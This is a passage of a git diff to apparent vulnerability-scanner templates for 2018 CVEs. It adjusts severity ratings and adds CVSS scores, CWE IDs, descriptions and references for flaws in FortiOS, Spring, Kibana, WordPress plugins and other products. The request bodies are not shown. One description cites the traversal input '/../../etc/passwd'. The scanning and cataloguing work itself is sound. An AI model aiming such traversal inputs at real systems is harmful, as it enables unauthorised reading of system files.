portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication)." requests: - method: GET diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml index ac652812c9..ed8c7f4131 100644 --- a/cves/2018/CVE-2018-12634.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: CirCarLife is an internet-connected electric vehicle charging station reference: https://circontrol.com/ - severity: medium + severity: critical tags: cve,cve2018,scada,circontrol,circarlife,logs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-12634 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-1271.yaml b/cves/2018/CVE-2018-1271.yaml index 69e95546f3..52a285b05a 100644 --- a/cves/2018/CVE-2018-1271.yaml +++ b/cves/2018/CVE-2018-1271.yaml @@ -3,9 +3,15 @@ id: CVE-2018-1271 info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr - severity: high + severity: medium reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d tags: cve,cve2018,spring,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.90 + cve-id: CVE-2018-1271 + cwe-id: CWE-22 + description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." requests: - method: GET diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index e5adf3a49d..819b07b7a6 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -13,6 +13,11 @@ info: or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 tags: cve,cve2018,vmware,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1273 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 407d1422cc..87f73ec29a 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml @@ -3,11 +3,16 @@ id: CVE-2018-1335 info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu - severity: critical + severity: high reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 tags: cve,cve2018,apache,tika,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-1335 + description: "From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18." requests: - method: PUT diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index b0f305d163..93cc9387a3 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml @@ -3,8 +3,17 @@ id: CVE-2018-13379 info: name: FortiOS - Credentials Disclosure author: organiccrap - severity: high + severity: critical tags: cve,cve2018,fortios + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-13379 + cwe-id: CWE-22 + description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests." + reference: + - https://fortiguard.com/advisory/FG-IR-18-384 + - https://www.fortiguard.com/psirt/FG-IR-20-233 requests: - method: GET diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml index d8cd9eb565..96cfe5534c 100644 --- a/cves/2018/CVE-2018-13380.yaml +++ b/cves/2018/CVE-2018-13380.yaml @@ -7,6 +7,11 @@ info: description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 tags: cve,cve2018,fortios,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-13380 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml index 6c5d601a6f..cee7520213 100644 --- a/cves/2018/CVE-2018-14013.yaml +++ b/cves/2018/CVE-2018-14013.yaml @@ -7,6 +7,11 @@ info: description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 tags: cve,cve2018,xss,zimbra + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14013 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml index ddac97cab7..f3452b953f 100644 --- a/cves/2018/CVE-2018-14064.yaml +++ b/cves/2018/CVE-2018-14064.yaml @@ -3,13 +3,18 @@ id: CVE-2018-14064 info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko - severity: high + severity: critical description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 tags: cve,cve2018,lfi,camera,iot + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-14064 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml index 1d95f3bd33..18f87e359a 100644 --- a/cves/2018/CVE-2018-14574.yaml +++ b/cves/2018/CVE-2018-14574.yaml @@ -3,8 +3,21 @@ id: CVE-2018-14574 info: name: Django Open Redirect author: pikpikcu - severity: low + severity: medium tags: cve,cve2018,django,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14574 + cwe-id: CWE-601 + description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect." + reference: + - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ + - https://usn.ubuntu.com/3726-1/ + - http://www.securitytracker.com/id/1041403 + - https://www.debian.org/security/2018/dsa-4264 + - http://www.securityfocus.com/bid/104970 + - https://access.redhat.com/errata/RHSA-2019:0265 requests: - method: GET diff --git a/cves/2018/CVE-2018-14728.yaml b/cves/2018/CVE-2018-14728.yaml index 09d221c05a..0eaff41a52 100644 --- a/cves/2018/CVE-2018-14728.yaml +++ b/cves/2018/CVE-2018-14728.yaml @@ -3,8 +3,17 @@ id: CVE-2018-14728 info: name: Responsive filemanager 9.13.1 - SSRF/LFI author: madrobot - severity: high + severity: critical tags: cve,cve2018,ssrf,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-14728 + cwe-id: CWE-918 + description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter." + reference: + - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html + - https://www.exploit-db.com/exploits/45103/ requests: - method: POST diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml index d13e41671f..546ea91901 100644 --- a/cves/2018/CVE-2018-15473.yaml +++ b/cves/2018/CVE-2018-15473.yaml @@ -3,10 +3,15 @@ id: CVE-2018-15473 info: name: OpenSSH Username Enumeration author: r3dg33k,daffainfo - severity: low + severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 tags: network,openssh,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-15473 + cwe-id: CWE-362 network: - host: diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index bfeb74b4de..ffe7f7ad24 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml @@ -6,8 +6,13 @@ info: reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt author: gy741 - severity: medium + severity: high tags: cve,cve2018,dlink,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N + cvss-score: 8.60 + cve-id: CVE-2018-15517 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml index 4c6646ce68..2304115e39 100644 --- a/cves/2018/CVE-2018-15535.yaml +++ b/cves/2018/CVE-2018-15535.yaml @@ -3,12 +3,17 @@ id: CVE-2018-15535 info: name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo - severity: medium + severity: high description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 - https://www.cvedetails.com/cve/CVE-2018-15535 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-15535 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-15745.yaml b/cves/2018/CVE-2018-15745.yaml index 1c889bef1d..5b249a3069 100644 --- a/cves/2018/CVE-2018-15745.yaml +++ b/cves/2018/CVE-2018-15745.yaml @@ -7,6 +7,11 @@ info: description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt tags: cve,cve2018,argussurveillance,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-15745 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index 1b13402b1e..2511f58f0e 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://www.exploit-db.com/exploits/45342 tags: cve,cve2018,iot,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16059 + cwe-id: CWE-22 + description: "Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter." requests: - method: POST diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 9f8c759dfc..da711614f9 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 tags: cve,cve2018,logontracer,rce,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16167 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index f0ff1c0ca4..5da2280652 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://www.exploit-db.com/exploits/45438 tags: cve,cve2018,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16283 + cwe-id: CWE-22 + description: "The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter." requests: - method: GET diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml index 8705a4dbee..d74869f104 100644 --- a/cves/2018/CVE-2018-16288.yaml +++ b/cves/2018/CVE-2018-16288.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45440 - https://www.cvedetails.com/cve/CVE-2018-16288 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2018-16288 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index fc05d97e9b..08a387bb74 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -7,6 +7,11 @@ info: description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter. reference: https://www.exploit-db.com/exploits/45439 tags: wordpress,cve2018,cve,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-16299 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-16668.yaml b/cves/2018/CVE-2018-16668.yaml index c871990b87..76cc91f0bd 100644 --- a/cves/2018/CVE-2018-16668.yaml +++ b/cves/2018/CVE-2018-16668.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,iot,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16668 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-16670.yaml b/cves/2018/CVE-2018-16670.yaml index f9157661e3..b253aecfda 100644 --- a/cves/2018/CVE-2018-16670.yaml +++ b/cves/2018/CVE-2018-16670.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,plc,iot,disclosure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16670 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-16671.yaml b/cves/2018/CVE-2018-16671.yaml index df6b1f3871..2457153b08 100644 --- a/cves/2018/CVE-2018-16671.yaml +++ b/cves/2018/CVE-2018-16671.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,iot,disclosure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16671 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index d04aa76fc8..bcdb226a69 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -9,6 +9,12 @@ info: - https://www.exploit-db.com/exploits/47138 - https://www.getfuelcms.com/ # Vendor Homepage - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Software Link + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16763 + cwe-id: CWE-74 + description: "FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution." requests: - raw: diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml index 15aa7503d3..c4f12c3f51 100644 --- a/cves/2018/CVE-2018-17246.yaml +++ b/cves/2018/CVE-2018-17246.yaml @@ -2,12 +2,17 @@ id: CVE-2018-17246 info: name: Kibana Local File Inclusion author: princechaddha - severity: high + severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17246 + cwe-id: CWE-829 requests: - method: GET diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 433bc92b78..4cfc98d6bf 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -4,11 +4,16 @@ info: name: Joomla JCK Editor SQL Injection author: Suman_Kar description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. - severity: high + severity: critical tags: joomla,sqli,cve,cve2018 reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17254 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index 9f70ac8290..ab6e84abda 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17431 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2018/CVE-2018-18069.yaml b/cves/2018/CVE-2018-18069.yaml index 890bb000cc..eab47b98dc 100644 --- a/cves/2018/CVE-2018-18069.yaml +++ b/cves/2018/CVE-2018-18069.yaml @@ -6,6 +6,13 @@ info: severity: medium description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. tags: cve,cve2018,wordpress,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + reference: + - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ requests: - method: POST diff --git a/cves/2018/CVE-2018-18775.yaml b/cves/2018/CVE-2018-18775.yaml index 12b50a4ea4..97386a655c 100644 --- a/cves/2018/CVE-2018-18775.yaml +++ b/cves/2018/CVE-2018-18775.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: microstrategy,xss reference: https://www.exploit-db.com/exploits/45755 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18775 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index cba64072e6..742080b74f 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml @@ -3,13 +3,18 @@ id: CVE-2018-18777 info: name: Path traversal vulnerability in Microstrategy Web version 7 author: 0x_Akoko - severity: high + severity: medium description: | Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. reference: https://www.exploit-db.com/exploits/45755 tags: microstrategy,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2018-18777 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml index 51fa08f10d..556e6cf52e 100644 --- a/cves/2018/CVE-2018-18778.yaml +++ b/cves/2018/CVE-2018-18778.yaml @@ -3,10 +3,15 @@ id: CVE-2018-18778 info: name: mini_httpd Path Traversal author: dhiyaneshDK - severity: high + severity: medium description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-18778 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml index 7e686b8ceb..1d426ddfe2 100644 --- a/cves/2018/CVE-2018-19386.yaml +++ b/cves/2018/CVE-2018-19386.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://www.cvedetails.com/cve/CVE-2018-19386/ tags: cve,cve2018,solarwinds,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-19386 + cwe-id: CWE-79 + description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI." requests: - method: GET diff --git a/cves/2018/CVE-2018-19439.yaml b/cves/2018/CVE-2018-19439.yaml index b953866c96..ba2f295d30 100644 --- a/cves/2018/CVE-2018-19439.yaml +++ b/cves/2018/CVE-2018-19439.yaml @@ -3,9 +3,18 @@ id: CVE-2018-19439 info: name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console author: madrobot,dwisiswant0 - severity: high + severity: medium description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4) tags: cve,cve2018,oracle,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-19439 + cwe-id: CWE-79 + reference: + - http://www.securityfocus.com/bid/106006 + - http://seclists.org/fulldisclosure/2018/Nov/58 + - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html requests: - method: GET diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml index bd3bb051fe..8bfc61e40a 100644 --- a/cves/2018/CVE-2018-19458.yaml +++ b/cves/2018/CVE-2018-19458.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45780 - https://www.cvedetails.com/cve/CVE-2018-19458 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-19458 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index a7af37791e..fa78623265 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -7,6 +7,11 @@ info: description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-20462 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml index 980bd20b83..15ee6fd76f 100644 --- a/cves/2018/CVE-2018-20470.yaml +++ b/cves/2018/CVE-2018-20470.yaml @@ -9,6 +9,11 @@ info: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://www.cvedetails.com/cve/CVE-2018-20470 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-20470 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-20824.yaml b/cves/2018/CVE-2018-20824.yaml index a86b7d6a62..174487aad6 100644 --- a/cves/2018/CVE-2018-20824.yaml +++ b/cves/2018/CVE-2018-20824.yaml @@ -6,6 +6,13 @@ info: severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter. tags: cve,cve2018,atlassian,jira,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-20824 + cwe-id: CWE-79 + reference: + - https://jira.atlassian.com/browse/JRASERVER-69238 requests: - method: GET diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index b2e578153b..9158d407cd 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -7,8 +7,13 @@ info: reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://www.cvedetails.com/cve/CVE-2018-20985/ - severity: high + severity: critical tags: cve,cve2018,wordpress,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-20985 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml index 23b40cee1b..448abf9d82 100644 --- a/cves/2018/CVE-2018-2392.yaml +++ b/cves/2018/CVE-2018-2392.yaml @@ -13,6 +13,11 @@ info: - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/ - https://troopers.de/troopers18/agenda/3r38lr/ - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2018-2392 + cwe-id: CWE-611 requests: - raw: diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml index 0421d15888..86e858609d 100644 --- a/cves/2018/CVE-2018-2628.yaml +++ b/cves/2018/CVE-2018-2628.yaml @@ -3,9 +3,15 @@ id: CVE-2018-2628 info: name: Oracle WebLogic Server Deserialization RCE author: milo2012 - severity: high + severity: critical reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 tags: 